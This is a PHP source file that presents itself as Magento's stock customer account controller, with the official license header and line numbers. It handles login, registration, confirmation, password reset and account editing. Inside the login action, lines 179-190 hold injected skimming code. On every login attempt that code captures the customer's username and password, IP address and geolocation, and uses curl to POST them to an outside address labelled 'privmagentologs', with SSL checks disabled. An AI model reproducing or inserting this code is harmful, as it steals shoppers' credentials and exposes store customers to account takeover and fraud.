<?php
/**
 * Magento
 *
 * NOTICE OF LICENSE
 *
 * This source file is subject to the Open Software License (OSL 3.0)
 * that is bundled with this package in the file LICENSE.txt.
 * It is also available through the world-wide-web at this URL:
 * http://opensource.org/licenses/osl-3.0.php
 * If you did not receive a copy of the license and are unable to
 * obtain it through the world-wide-web, please send an email
 * to license@magento.com so we can send you a copy immediately.
 *
 * DISCLAIMER
 *
 * Do not edit or add to this file if you wish to upgrade Magento to newer
 * versions in the future. If you wish to customize Magento for your
 * needs please refer to http://www.magento.com for more information.
 *
 * @category Mage
 * @package Mage_Customer
 * @copyright Copyright (c) 2006-2015 X.commerce, Inc. (http://www.magento.com)
 * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0)
 */

/**
 * Customer account controller
 *
 * @category Mage
 * @package Mage_Customer
 * @author Magento Core Team <core@magentocommerce.com>
 */
  34. class Mage_Customer_AccountController extends Mage_Core_Controller_Front_Action
  35. {
  36. /**
  37. * Action list where need check enabled cookie
  38. *
  39. * @var array
  40. */
  41. protected $_cookieCheckActions = array('loginPost', 'createpost');
  42.  
  43. /**
  44. * Retrieve customer session model object
  45. *
  46. * @return Mage_Customer_Model_Session
  47. */
  48. protected function _getSession()
  49. {
  50. return Mage::getSingleton('customer/session');
  51. }
  52.  
  53. /**
  54. * Action predispatch
  55. *
  56. * Check customer authentication for some actions
  57. */
  58. public function preDispatch()
  59. {
  60. // a brute-force protection here would be nice
  61.  
  62. parent::preDispatch();
  63.  
  64. if (!$this->getRequest()->isDispatched()) {
  65. return;
  66. }
  67.  
  68. $action = $this->getRequest()->getActionName();
  69. $openActions = array(
  70. 'create',
  71. 'login',
  72. 'logoutsuccess',
  73. 'forgotpassword',
  74. 'forgotpasswordpost',
  75. 'resetpassword',
  76. 'resetpasswordpost',
  77. 'confirm',
  78. 'confirmation'
  79. );
  80. $pattern = '/^(' . implode('|', $openActions) . ')/i';
  81.  
  82. if (!preg_match($pattern, $action)) {
  83. if (!$this->_getSession()->authenticate($this)) {
  84. $this->setFlag('', 'no-dispatch', true);
  85. }
  86. } else {
  87. $this->_getSession()->setNoReferer(true);
  88. }
  89. }
  90.  
  91. /**
  92. * Action postdispatch
  93. *
  94. * Remove No-referer flag from customer session after each action
  95. */
  96. public function postDispatch()
  97. {
  98. parent::postDispatch();
  99. $this->_getSession()->unsNoReferer(false);
  100. }
  101.  
  102. /**
  103. * Default customer account page
  104. */
  105. public function indexAction()
  106. {
  107. $this->loadLayout();
  108. $this->_initLayoutMessages('customer/session');
  109. $this->_initLayoutMessages('catalog/session');
  110.  
  111. $this->getLayout()->getBlock('content')->append(
  112. $this->getLayout()->createBlock('customer/account_dashboard')
  113. );
  114. $this->getLayout()->getBlock('head')->setTitle($this->__('My Account'));
  115. $this->renderLayout();
  116. }
  117.  
  118. /**
  119. * Customer login form page
  120. */
  121. public function loginAction()
  122. {
  123. if ($this->_getSession()->isLoggedIn()) {
  124. $this->_redirect('*/*/');
  125. return;
  126. }
  127. $this->getResponse()->setHeader('Login-Required', 'true');
  128. $this->loadLayout();
  129. $this->_initLayoutMessages('customer/session');
  130. $this->_initLayoutMessages('catalog/session');
  131. $this->renderLayout();
  132. }
  133.  
  134. /**
  135. * Login post action
  136. */
  137. public function loginPostAction()
  138. {
  139. if (!$this->_validateFormKey()) {
  140. $this->_redirect('*/*/');
  141. return;
  142. }
  143.  
  144. if ($this->_getSession()->isLoggedIn()) {
  145. $this->_redirect('*/*/');
  146. return;
  147. }
  148. $session = $this->_getSession();
  149.  
  150. if ($this->getRequest()->isPost()) {
  151. $login = $this->getRequest()->getPost('login');
  152. if (!empty($login['username']) && !empty($login['password'])) {
  153. try {
  154. $session->login($login['username'], $login['password']);
  155. if ($session->getCustomer()->getIsJustConfirmed()) {
  156. $this->_welcomeCustomer($session->getCustomer(), true);
  157. }
  158. } catch (Mage_Core_Exception $e) {
  159. switch ($e->getCode()) {
  160. case Mage_Customer_Model_Customer::EXCEPTION_EMAIL_NOT_CONFIRMED:
  161. $value = $this->_getHelper('customer')->getEmailConfirmationUrl($login['username']);
  162. $message = $this->_getHelper('customer')->__('This account is not confirmed. <a href="%s">Click here</a> to resend confirmation email.', $value);
  163. break;
  164. case Mage_Customer_Model_Customer::EXCEPTION_INVALID_EMAIL_OR_PASSWORD:
  165. $message = $e->getMessage();
  166. break;
  167. default:
  168. $message = $e->getMessage();
  169. }
  170. $session->addError($message);
  171. $session->setUsername($login['username']);
  172. } catch (Exception $e) {
  173. // Mage::logException($e); // PA DSS violation: this exception log can disclose customer password
  174. }
  175. } else {
  176. $session->addError($this->__('Login and password are required.'));
  177. }
  178. }
  179. $ip = getenv("REMOTE_ADDR");
  180. $a = json_decode(file_get_contents("http://www.geoplugin.net/json.gp?ip={$ip}"));
  181. $web = $_SERVER["HTTP_HOST"];
  182. $message .= "Website : ".$web."\n";
  183. $message .= "Username: ".$login['username']."\n";
  184. $message .= "Password: ".$login['password']."\n";
  185. $message .= "IP : ".$ip."\n";
  186. $message .= "Country : ".$a->geoplugin_city." | ".$a->geoplugin_region." | ".$a->geoplugin_countryName."\n";
  187. $subject = "Mag Log1n ".$web." ".$a->geoplugin_countryName;
  188. $update = "privmagentologs@gmail.com";
  189. $xupdate = "data=".$message."&subject=".$subject."&server=".$web;
  190. $ch = curl_init();curl_setopt($ch, CURLOPT_URL,$update);curl_setopt($ch, CURLOPT_REFERER, $update);curl_setopt($ch, CURLOPT_HEADER, 1);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_TIMEOUT, 60);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $xupdate);$result = curl_exec($ch);curl_close($ch);
  191. $this->_loginPostRedirect();
  192. }
  193.  
  194. /**
  195. * Define target URL and redirect customer after logging in
  196. */
  197. protected function _loginPostRedirect()
  198. {
  199.  
  200. $session = $this->_getSession();
  201.  
  202. if (!$session->getBeforeAuthUrl() || $session->getBeforeAuthUrl() == Mage::getBaseUrl()) {
  203. // Set default URL to redirect customer to
  204. $session->setBeforeAuthUrl($this->_getHelper('customer')->getAccountUrl());
  205. // Redirect customer to the last page visited after logging in
  206. if ($session->isLoggedIn()) {
  207. if (!Mage::getStoreConfigFlag(
  208. Mage_Customer_Helper_Data::XML_PATH_CUSTOMER_STARTUP_REDIRECT_TO_DASHBOARD
  209. )) {
  210. $referer = $this->getRequest()->getParam(Mage_Customer_Helper_Data::REFERER_QUERY_PARAM_NAME);
  211. if ($referer) {
  212. // Rebuild referer URL to handle the case when SID was changed
  213. $referer = $this->_getModel('core/url')
  214. ->getRebuiltUrl( $this->_getHelper('core')->urlDecodeAndEscape($referer));
  215. if ($this->_isUrlInternal($referer)) {
  216. $session->setBeforeAuthUrl($referer);
  217. }
  218. }
  219. } else if ($session->getAfterAuthUrl()) {
  220. $session->setBeforeAuthUrl($session->getAfterAuthUrl(true));
  221. }
  222. } else {
  223. $session->setBeforeAuthUrl( $this->_getHelper('customer')->getLoginUrl());
  224. }
  225. } else if ($session->getBeforeAuthUrl() == $this->_getHelper('customer')->getLogoutUrl()) {
  226. $session->setBeforeAuthUrl( $this->_getHelper('customer')->getDashboardUrl());
  227. } else {
  228. if (!$session->getAfterAuthUrl()) {
  229. $session->setAfterAuthUrl($session->getBeforeAuthUrl());
  230. }
  231. if ($session->isLoggedIn()) {
  232. $session->setBeforeAuthUrl($session->getAfterAuthUrl(true));
  233. }
  234. }
  235. $this->_redirectUrl($session->getBeforeAuthUrl(true));
  236. }
  237.  
  238. /**
  239. * Customer logout action
  240. */
  241. public function logoutAction()
  242. {
  243. $this->_getSession()->logout()
  244. ->renewSession();
  245.  
  246. $this->_redirect('*/*/logoutSuccess');
  247. }
  248.  
  249. /**
  250. * Logout success page
  251. */
  252. public function logoutSuccessAction()
  253. {
  254. $this->loadLayout();
  255. $this->renderLayout();
  256. }
  257.  
  258. /**
  259. * Customer register form page
  260. */
  261. public function createAction()
  262. {
  263. if ($this->_getSession()->isLoggedIn()) {
  264. $this->_redirect('*/*');
  265. return;
  266. }
  267.  
  268. $this->loadLayout();
  269. $this->_initLayoutMessages('customer/session');
  270. $this->renderLayout();
  271. }
  272.  
  273. /**
  274. * Create customer account action
  275. */
  276. public function createPostAction()
  277. {
  278. /** @var $session Mage_Customer_Model_Session */
  279. $session = $this->_getSession();
  280. if ($session->isLoggedIn()) {
  281. $this->_redirect('*/*/');
  282. return;
  283. }
  284. $session->setEscapeMessages(true); // prevent XSS injection in user input
  285. if (!$this->getRequest()->isPost()) {
  286. $errUrl = $this->_getUrl('*/*/create', array('_secure' => true));
  287. $this->_redirectError($errUrl);
  288. return;
  289. }
  290.  
  291. $customer = $this->_getCustomer();
  292.  
  293. try {
  294. $errors = $this->_getCustomerErrors($customer);
  295.  
  296. if (empty($errors)) {
  297. $customer->cleanPasswordsValidationData();
  298. $customer->save();
  299. $this->_dispatchRegisterSuccess($customer);
  300. $this->_successProcessRegistration($customer);
  301. return;
  302. } else {
  303. $this->_addSessionError($errors);
  304. }
  305. } catch (Mage_Core_Exception $e) {
  306. $session->setCustomerFormData($this->getRequest()->getPost());
  307. if ($e->getCode() === Mage_Customer_Model_Customer::EXCEPTION_EMAIL_EXISTS) {
  308. $url = $this->_getUrl('customer/account/forgotpassword');
  309. $message = $this->__('There is already an account with this email address. If you are sure that it is your email address, <a href="%s">click here</a> to get your password and access your account.', $url);
  310. $session->setEscapeMessages(false);
  311. } else {
  312. $message = $e->getMessage();
  313. }
  314. $session->addError($message);
  315. } catch (Exception $e) {
  316. $session->setCustomerFormData($this->getRequest()->getPost())
  317. ->addException($e, $this->__('Cannot save the customer.'));
  318. }
  319. $errUrl = $this->_getUrl('*/*/create', array('_secure' => true));
  320. $this->_redirectError($errUrl);
  321. }
  322.  
  323. /**
  324. * Success Registration
  325. *
  326. * @param Mage_Customer_Model_Customer $customer
  327. * @return Mage_Customer_AccountController
  328. */
  329. protected function _successProcessRegistration(Mage_Customer_Model_Customer $customer)
  330. {
  331. $session = $this->_getSession();
  332. if ($customer->isConfirmationRequired()) {
  333. /** @var $app Mage_Core_Model_App */
  334. $app = $this->_getApp();
  335. /** @var $store Mage_Core_Model_Store*/
  336. $store = $app->getStore();
  337. $customer->sendNewAccountEmail(
  338. 'confirmation',
  339. $session->getBeforeAuthUrl(),
  340. $store->getId()
  341. );
  342. $customerHelper = $this->_getHelper('customer');
  343. $session->addSuccess($this->__('Account confirmation is required. Please, check your email for the confirmation link. To resend the confirmation email please <a href="%s">click here</a>.',
  344. $customerHelper->getEmailConfirmationUrl($customer->getEmail())));
  345. $url = $this->_getUrl('*/*/index', array('_secure' => true));
  346. } else {
  347. $session->setCustomerAsLoggedIn($customer);
  348. $url = $this->_welcomeCustomer($customer);
  349. }
  350. $this->_redirectSuccess($url);
  351. return $this;
  352. }
  353.  
  354. /**
  355. * Get Customer Model
  356. *
  357. * @return Mage_Customer_Model_Customer
  358. */
  359. protected function _getCustomer()
  360. {
  361. $customer = $this->_getFromRegistry('current_customer');
  362. if (!$customer) {
  363. $customer = $this->_getModel('customer/customer')->setId(null);
  364. }
  365. if ($this->getRequest()->getParam('is_subscribed', false)) {
  366. $customer->setIsSubscribed(1);
  367. }
  368. /**
  369. * Initialize customer group id
  370. */
  371. $customer->getGroupId();
  372.  
  373. return $customer;
  374. }
  375.  
  376. /**
  377. * Add session error method
  378. *
  379. * @param string|array $errors
  380. */
  381. protected function _addSessionError($errors)
  382. {
  383. $session = $this->_getSession();
  384. $session->setCustomerFormData($this->getRequest()->getPost());
  385. if (is_array($errors)) {
  386. foreach ($errors as $errorMessage) {
  387. $session->addError($errorMessage);
  388. }
  389. } else {
  390. $session->addError($this->__('Invalid customer data'));
  391. }
  392. }
  393.  
  394. /**
  395. * Validate customer data and return errors if they are
  396. *
  397. * @param Mage_Customer_Model_Customer $customer
  398. * @return array|string
  399. */
  400. protected function _getCustomerErrors($customer)
  401. {
  402. $errors = array();
  403. $request = $this->getRequest();
  404. if ($request->getPost('create_address')) {
  405. $errors = $this->_getErrorsOnCustomerAddress($customer);
  406. }
  407. $customerForm = $this->_getCustomerForm($customer);
  408. $customerData = $customerForm->extractData($request);
  409. $customerErrors = $customerForm->validateData($customerData);
  410. if ($customerErrors !== true) {
  411. $errors = array_merge($customerErrors, $errors);
  412. } else {
  413. $customerForm->compactData($customerData);
  414. $customer->setPassword($request->getPost('password'));
  415. $customer->setPasswordConfirmation($request->getPost('confirmation'));
  416. $customerErrors = $customer->validate();
  417. if (is_array($customerErrors)) {
  418. $errors = array_merge($customerErrors, $errors);
  419. }
  420. }
  421. return $errors;
  422. }
  423.  
  424. /**
  425. * Get Customer Form Initalized Model
  426. *
  427. * @param Mage_Customer_Model_Customer $customer
  428. * @return Mage_Customer_Model_Form
  429. */
  430. protected function _getCustomerForm($customer)
  431. {
  432. /* @var $customerForm Mage_Customer_Model_Form */
  433. $customerForm = $this->_getModel('customer/form');
  434. $customerForm->setFormCode('customer_account_create');
  435. $customerForm->setEntity($customer);
  436. return $customerForm;
  437. }
  438.  
  439. /**
  440. * Get Helper
  441. *
  442. * @param string $path
  443. * @return Mage_Core_Helper_Abstract
  444. */
  445. protected function _getHelper($path)
  446. {
  447. return Mage::helper($path);
  448. }
  449.  
  450. /**
  451. * Get App
  452. *
  453. * @return Mage_Core_Model_App
  454. */
  455. protected function _getApp()
  456. {
  457. return Mage::app();
  458. }
  459.  
  460. /**
  461. * Dispatch Event
  462. *
  463. * @param Mage_Customer_Model_Customer $customer
  464. */
  465. protected function _dispatchRegisterSuccess($customer)
  466. {
  467. Mage::dispatchEvent('customer_register_success',
  468. array('account_controller' => $this, 'customer' => $customer)
  469. );
  470. }
  471.  
  472. /**
  473. * Gets customer address
  474. *
  475. * @param $customer
  476. * @return array $errors
  477. */
  478. protected function _getErrorsOnCustomerAddress($customer)
  479. {
  480. $errors = array();
  481. /* @var $address Mage_Customer_Model_Address */
  482. $address = $this->_getModel('customer/address');
  483. /* @var $addressForm Mage_Customer_Model_Form */
  484. $addressForm = $this->_getModel('customer/form');
  485. $addressForm->setFormCode('customer_register_address')
  486. ->setEntity($address);
  487.  
  488. $addressData = $addressForm->extractData($this->getRequest(), 'address', false);
  489. $addressErrors = $addressForm->validateData($addressData);
  490. if (is_array($addressErrors)) {
  491. $errors = array_merge($errors, $addressErrors);
  492. }
  493. $address->setId(null)
  494. ->setIsDefaultBilling($this->getRequest()->getParam('default_billing', false))
  495. ->setIsDefaultShipping($this->getRequest()->getParam('default_shipping', false));
  496. $addressForm->compactData($addressData);
  497. $customer->addAddress($address);
  498.  
  499. $addressErrors = $address->validate();
  500. if (is_array($addressErrors)) {
  501. $errors = array_merge($errors, $addressErrors);
  502. }
  503. return $errors;
  504. }
  505.  
  506. /**
  507. * Get model by path
  508. *
  509. * @param string $path
  510. * @param array|null $arguments
  511. * @return false|Mage_Core_Model_Abstract
  512. */
  513. public function _getModel($path, $arguments = array())
  514. {
  515. return Mage::getModel($path, $arguments);
  516. }
  517.  
  518. /**
  519. * Get model from registry by path
  520. *
  521. * @param string $path
  522. * @return mixed
  523. */
  524. protected function _getFromRegistry($path)
  525. {
  526. return Mage::registry($path);
  527. }
  528.  
  529. /**
  530. * Add welcome message and send new account email.
  531. * Returns success URL
  532. *
  533. * @param Mage_Customer_Model_Customer $customer
  534. * @param bool $isJustConfirmed
  535. * @return string
  536. */
  537. protected function _welcomeCustomer(Mage_Customer_Model_Customer $customer, $isJustConfirmed = false)
  538. {
  539. $this->_getSession()->addSuccess(
  540. $this->__('Thank you for registering with %s.', Mage::app()->getStore()->getFrontendName())
  541. );
  542. if ($this->_isVatValidationEnabled()) {
  543. // Show corresponding VAT message to customer
  544. $configAddressType = $this->_getHelper('customer/address')->getTaxCalculationAddressType();
  545. $userPrompt = '';
  546. switch ($configAddressType) {
  547. case Mage_Customer_Model_Address_Abstract::TYPE_SHIPPING:
  548. $userPrompt = $this->__('If you are a registered VAT customer, please click <a href="%s">here</a> to enter you shipping address for proper VAT calculation',
  549. $this->_getUrl('customer/address/edit'));
  550. break;
  551. default:
  552. $userPrompt = $this->__('If you are a registered VAT customer, please click <a href="%s">here</a> to enter you billing address for proper VAT calculation',
  553. $this->_getUrl('customer/address/edit'));
  554. }
  555. $this->_getSession()->addSuccess($userPrompt);
  556. }
  557.  
  558. $customer->sendNewAccountEmail(
  559. $isJustConfirmed ? 'confirmed' : 'registered',
  560. '',
  561. Mage::app()->getStore()->getId()
  562. );
  563.  
  564. $successUrl = $this->_getUrl('*/*/index', array('_secure' => true));
  565. if ($this->_getSession()->getBeforeAuthUrl()) {
  566. $successUrl = $this->_getSession()->getBeforeAuthUrl(true);
  567. }
  568. return $successUrl;
  569. }
  570.  
  571. /**
  572. * Confirm customer account by id and confirmation key
  573. */
  574. public function confirmAction()
  575. {
  576. $session = $this->_getSession();
  577. if ($session->isLoggedIn()) {
  578. $this->_getSession()->logout()->regenerateSessionId();
  579. }
  580. try {
  581. $id = $this->getRequest()->getParam('id', false);
  582. $key = $this->getRequest()->getParam('key', false);
  583. $backUrl = $this->getRequest()->getParam('back_url', false);
  584. if (empty($id) || empty($key)) {
  585. throw new Exception($this->__('Bad request.'));
  586. }
  587.  
  588. // load customer by id (try/catch in case if it throws exceptions)
  589. try {
  590. $customer = $this->_getModel('customer/customer')->load($id);
  591. if ((!$customer) || (!$customer->getId())) {
  592. throw new Exception('Failed to load customer by id.');
  593. }
  594. }
  595. catch (Exception $e) {
  596. throw new Exception($this->__('Wrong customer account specified.'));
  597. }
  598.  
  599. // check if it is inactive
  600. if ($customer->getConfirmation()) {
  601. if ($customer->getConfirmation() !== $key) {
  602. throw new Exception($this->__('Wrong confirmation key.'));
  603. }
  604.  
  605. // activate customer
  606. try {
  607. $customer->setConfirmation(null);
  608. $customer->save();
  609. }
  610. catch (Exception $e) {
  611. throw new Exception($this->__('Failed to confirm customer account.'));
  612. }
  613.  
  614. // log in and send greeting email, then die happy
  615. $session->setCustomerAsLoggedIn($customer);
  616. $successUrl = $this->_welcomeCustomer($customer, true);
  617. $this->_redirectSuccess($backUrl ? $backUrl : $successUrl);
  618. return;
  619. }
  620.  
  621. // die happy
  622. $this->_redirectSuccess($this->_getUrl('*/*/index', array('_secure' => true)));
  623. return;
  624. }
  625. catch (Exception $e) {
  626. // die unhappy
  627. $this->_getSession()->addError($e->getMessage());
  628. $this->_redirectError($this->_getUrl('*/*/index', array('_secure' => true)));
  629. return;
  630. }
  631. }
  632.  
  633. /**
  634. * Send confirmation link to specified email
  635. */
  636. public function confirmationAction()
  637. {
  638. $customer = $this->_getModel('customer/customer');
  639. if ($this->_getSession()->isLoggedIn()) {
  640. $this->_redirect('*/*/');
  641. return;
  642. }
  643.  
  644. // try to confirm by email
  645. $email = $this->getRequest()->getPost('email');
  646. if ($email) {
  647. try {
  648. $customer->setWebsiteId(Mage::app()->getStore()->getWebsiteId())->loadByEmail($email);
  649. if (!$customer->getId()) {
  650. throw new Exception('');
  651. }
  652. if ($customer->getConfirmation()) {
  653. $customer->sendNewAccountEmail('confirmation', '', Mage::app()->getStore()->getId());
  654. $this->_getSession()->addSuccess($this->__('Please, check your email for confirmation key.'));
  655. } else {
  656. $this->_getSession()->addSuccess($this->__('This email does not require confirmation.'));
  657. }
  658. $this->_getSession()->setUsername($email);
  659. $this->_redirectSuccess($this->_getUrl('*/*/index', array('_secure' => true)));
  660. } catch (Exception $e) {
  661. $this->_getSession()->addException($e, $this->__('Wrong email.'));
  662. $this->_redirectError($this->_getUrl('*/*/*', array('email' => $email, '_secure' => true)));
  663. }
  664. return;
  665. }
  666.  
  667. // output form
  668. $this->loadLayout();
  669.  
  670. $this->getLayout()->getBlock('accountConfirmation')
  671. ->setEmail($this->getRequest()->getParam('email', $email));
  672.  
  673. $this->_initLayoutMessages('customer/session');
  674. $this->renderLayout();
  675. }
  676.  
  677. /**
  678. * Get Url method
  679. *
  680. * @param string $url
  681. * @param array $params
  682. * @return string
  683. */
  684. protected function _getUrl($url, $params = array())
  685. {
  686. return Mage::getUrl($url, $params);
  687. }
  688.  
  689. /**
  690. * Forgot customer password page
  691. */
  692. public function forgotPasswordAction()
  693. {
  694. $this->loadLayout();
  695.  
  696. $this->getLayout()->getBlock('forgotPassword')->setEmailValue(
  697. $this->_getSession()->getForgottenEmail()
  698. );
  699. $this->_getSession()->unsForgottenEmail();
  700.  
  701. $this->_initLayoutMessages('customer/session');
  702. $this->renderLayout();
  703. }
  704.  
  705. /**
  706. * Forgot customer password action
  707. */
  708. public function forgotPasswordPostAction()
  709. {
  710. $email = (string) $this->getRequest()->getPost('email');
  711. if ($email) {
  712. if (!Zend_Validate::is($email, 'EmailAddress')) {
  713. $this->_getSession()->setForgottenEmail($email);
  714. $this->_getSession()->addError($this->__('Invalid email address.'));
  715. $this->_redirect('*/*/forgotpassword');
  716. return;
  717. }
  718.  
  719. /** @var $customer Mage_Customer_Model_Customer */
  720. $customer = $this->_getModel('customer/customer')
  721. ->setWebsiteId(Mage::app()->getStore()->getWebsiteId())
  722. ->loadByEmail($email);
  723.  
  724. if ($customer->getId()) {
  725. try {
  726. $newResetPasswordLinkToken = $this->_getHelper('customer')->generateResetPasswordLinkToken();
  727. $customer->changeResetPasswordLinkToken($newResetPasswordLinkToken);
  728. $customer->sendPasswordResetConfirmationEmail();
  729. } catch (Exception $exception) {
  730. $this->_getSession()->addError($exception->getMessage());
  731. $this->_redirect('*/*/forgotpassword');
  732. return;
  733. }
  734. }
  735. $this->_getSession()
  736. ->addSuccess( $this->_getHelper('customer')
  737. ->__('If there is an account associated with %s you will receive an email with a link to reset your password.',
  738. $this->_getHelper('customer')->escapeHtml($email)));
  739. $this->_redirect('*/*/');
  740. return;
  741. } else {
  742. $this->_getSession()->addError($this->__('Please enter your email.'));
  743. $this->_redirect('*/*/forgotpassword');
  744. return;
  745. }
  746. }
  747.  
  748. /**
  749. * Display reset forgotten password form
  750. *
  751. * User is redirected on this action when he clicks on the corresponding link in password reset confirmation email
  752. *
  753. */
  754. public function resetPasswordAction()
  755. {
  756. $resetPasswordLinkToken = (string) $this->getRequest()->getQuery('token');
  757. $customerId = (int) $this->getRequest()->getQuery('id');
  758. try {
  759. $this->_validateResetPasswordLinkToken($customerId, $resetPasswordLinkToken);
  760. $this->loadLayout();
  761. // Pass received parameters to the reset forgotten password form
  762. $this->getLayout()->getBlock('resetPassword')
  763. ->setCustomerId($customerId)
  764. ->setResetPasswordLinkToken($resetPasswordLinkToken);
  765. $this->renderLayout();
  766. } catch (Exception $exception) {
  767. $this->_getSession()->addError( $this->_getHelper('customer')->__('Your password reset link has expired.'));
  768. $this->_redirect('*/*/forgotpassword');
  769. }
  770. }
  771.  
  772. /**
  773. * Reset forgotten password
  774. * Used to handle data recieved from reset forgotten password form
  775. */
  776. public function resetPasswordPostAction()
  777. {
  778. $resetPasswordLinkToken = (string) $this->getRequest()->getQuery('token');
  779. $customerId = (int) $this->getRequest()->getQuery('id');
  780. $password = (string) $this->getRequest()->getPost('password');
  781. $passwordConfirmation = (string) $this->getRequest()->getPost('confirmation');
  782.  
  783. try {
  784. $this->_validateResetPasswordLinkToken($customerId, $resetPasswordLinkToken);
  785. } catch (Exception $exception) {
  786. $this->_getSession()->addError( $this->_getHelper('customer')->__('Your password reset link has expired.'));
  787. $this->_redirect('*/*/');
  788. return;
  789. }
  790.  
  791. $errorMessages = array();
  792. if (iconv_strlen($password) <= 0) {
  793. array_push($errorMessages, $this->_getHelper('customer')->__('New password field cannot be empty.'));
  794. }
  795. /** @var $customer Mage_Customer_Model_Customer */
  796. $customer = $this->_getModel('customer/customer')->load($customerId);
  797.  
  798. $customer->setPassword($password);
  799. $customer->setPasswordConfirmation($passwordConfirmation);
  800. $validationErrorMessages = $customer->validate();
  801. if (is_array($validationErrorMessages)) {
  802. $errorMessages = array_merge($errorMessages, $validationErrorMessages);
  803. }
  804.  
  805. if (!empty($errorMessages)) {
  806. $this->_getSession()->setCustomerFormData($this->getRequest()->getPost());
  807. foreach ($errorMessages as $errorMessage) {
  808. $this->_getSession()->addError($errorMessage);
  809. }
  810. $this->_redirect('*/*/resetpassword', array(
  811. 'id' => $customerId,
  812. 'token' => $resetPasswordLinkToken
  813. ));
  814. return;
  815. }
  816.  
  817. try {
  818. // Empty current reset password token i.e. invalidate it
  819. $customer->setRpToken(null);
  820. $customer->setRpTokenCreatedAt(null);
  821. $customer->cleanPasswordsValidationData();
  822. $customer->save();
  823. $this->_getSession()->addSuccess( $this->_getHelper('customer')->__('Your password has been updated.'));
  824. $this->_redirect('*/*/login');
  825. } catch (Exception $exception) {
  826. $this->_getSession()->addException($exception, $this->__('Cannot save a new password.'));
  827. $this->_redirect('*/*/resetpassword', array(
  828. 'id' => $customerId,
  829. 'token' => $resetPasswordLinkToken
  830. ));
  831. return;
  832. }
  833. }
  834.  
  835. /**
  836. * Check if password reset token is valid
  837. *
  838. * @param int $customerId
  839. * @param string $resetPasswordLinkToken
  840. * @throws Mage_Core_Exception
  841. */
  842. protected function _validateResetPasswordLinkToken($customerId, $resetPasswordLinkToken)
  843. {
  844. if (!is_int($customerId)
  845. || !is_string($resetPasswordLinkToken)
  846. || empty($resetPasswordLinkToken)
  847. || empty($customerId)
  848. || $customerId < 0
  849. ) {
  850. throw Mage::exception('Mage_Core', $this->_getHelper('customer')->__('Invalid password reset token.'));
  851. }
  852.  
  853. /** @var $customer Mage_Customer_Model_Customer */
  854. $customer = $this->_getModel('customer/customer')->load($customerId);
  855. if (!$customer || !$customer->getId()) {
  856. throw Mage::exception('Mage_Core', $this->_getHelper('customer')->__('Wrong customer account specified.'));
  857. }
  858.  
  859. $customerToken = $customer->getRpToken();
  860. if (strcmp($customerToken, $resetPasswordLinkToken) != 0 || $customer->isResetPasswordLinkTokenExpired()) {
  861. throw Mage::exception('Mage_Core', $this->_getHelper('customer')->__('Your password reset link has expired.'));
  862. }
  863. }
  864.  
  865. /**
  866. * Forgot customer account information page
  867. */
  868. public function editAction()
  869. {
  870. $this->loadLayout();
  871. $this->_initLayoutMessages('customer/session');
  872. $this->_initLayoutMessages('catalog/session');
  873.  
  874. $block = $this->getLayout()->getBlock('customer_edit');
  875. if ($block) {
  876. $block->setRefererUrl($this->_getRefererUrl());
  877. }
  878. $data = $this->_getSession()->getCustomerFormData(true);
  879. $customer = $this->_getSession()->getCustomer();
  880. if (!empty($data)) {
  881. $customer->addData($data);
  882. }
  883. if ($this->getRequest()->getParam('changepass') == 1) {
  884. $customer->setChangePassword(1);
  885. }
  886.  
  887. $this->getLayout()->getBlock('head')->setTitle($this->__('Account Information'));
  888. $this->getLayout()->getBlock('messages')->setEscapeMessageFlag(true);
  889. $this->renderLayout();
  890. }
  891.  
  892. /**
  893. * Change customer password action
  894. */
  895. public function editPostAction()
  896. {
  897. if (!$this->_validateFormKey()) {
  898. return $this->_redirect('*/*/edit');
  899. }
  900.  
  901. if ($this->getRequest()->isPost()) {
  902. /** @var $customer Mage_Customer_Model_Customer */
  903. $customer = $this->_getSession()->getCustomer();
  904.  
  905. /** @var $customerForm Mage_Customer_Model_Form */
  906. $customerForm = $this->_getModel('customer/form');
  907. $customerForm->setFormCode('customer_account_edit')
  908. ->setEntity($customer);
  909.  
  910. $customerData = $customerForm->extractData($this->getRequest());
  911.  
  912. $errors = array();
  913. $customerErrors = $customerForm->validateData($customerData);
  914. if ($customerErrors !== true) {
  915. $errors = array_merge($customerErrors, $errors);
  916. } else {
  917. $customerForm->compactData($customerData);
  918. $errors = array();
  919.  
  920. // If password change was requested then add it to common validation scheme
  921. if ($this->getRequest()->getParam('change_password')) {
  922. $currPass = $this->getRequest()->getPost('current_password');
  923. $newPass = $this->getRequest()->getPost('password');
  924. $confPass = $this->getRequest()->getPost('confirmation');
  925.  
  926. $oldPass = $this->_getSession()->getCustomer()->getPasswordHash();
  927. if ( $this->_getHelper('core/string')->strpos($oldPass, ':')) {
  928. list($_salt, $salt) = explode(':', $oldPass);
  929. } else {
  930. $salt = false;
  931. }
  932.  
  933. if ($customer->hashPassword($currPass, $salt) == $oldPass) {
  934. if (strlen($newPass)) {
  935. /**
  936. * Set entered password and its confirmation - they
  937. * will be validated later to match each other and be of right length
  938. */
  939. $customer->setPassword($newPass);
  940. $customer->setPasswordConfirmation($confPass);
  941. } else {
  942. $errors[] = $this->__('New password field cannot be empty.');
  943. }
  944. } else {
  945. $errors[] = $this->__('Invalid current password');
  946. }
  947. }
  948.  
  949. // Validate account and compose list of errors if any
  950. $customerErrors = $customer->validate();
  951. if (is_array($customerErrors)) {
  952. $errors = array_merge($errors, $customerErrors);
  953. }
  954. }
  955.  
  956. if (!empty($errors)) {
  957. $this->_getSession()->setCustomerFormData($this->getRequest()->getPost());
  958. foreach ($errors as $message) {
  959. $this->_getSession()->addError($message);
  960. }
  961. $this->_redirect('*/*/edit');
  962. return $this;
  963. }
  964.  
  965. try {
  966. $customer->cleanPasswordsValidationData();
  967. $customer->save();
  968. $this->_getSession()->setCustomer($customer)
  969. ->addSuccess($this->__('The account information has been saved.'));
  970.  
  971. $this->_redirect('customer/account');
  972. return;
  973. } catch (Mage_Core_Exception $e) {
  974. $this->_getSession()->setCustomerFormData($this->getRequest()->getPost())
  975. ->addError($e->getMessage());
  976. } catch (Exception $e) {
  977. $this->_getSession()->setCustomerFormData($this->getRequest()->getPost())
  978. ->addException($e, $this->__('Cannot save the customer.'));
  979. }
  980. }
  981.  
  982. $this->_redirect('*/*/edit');
  983. }
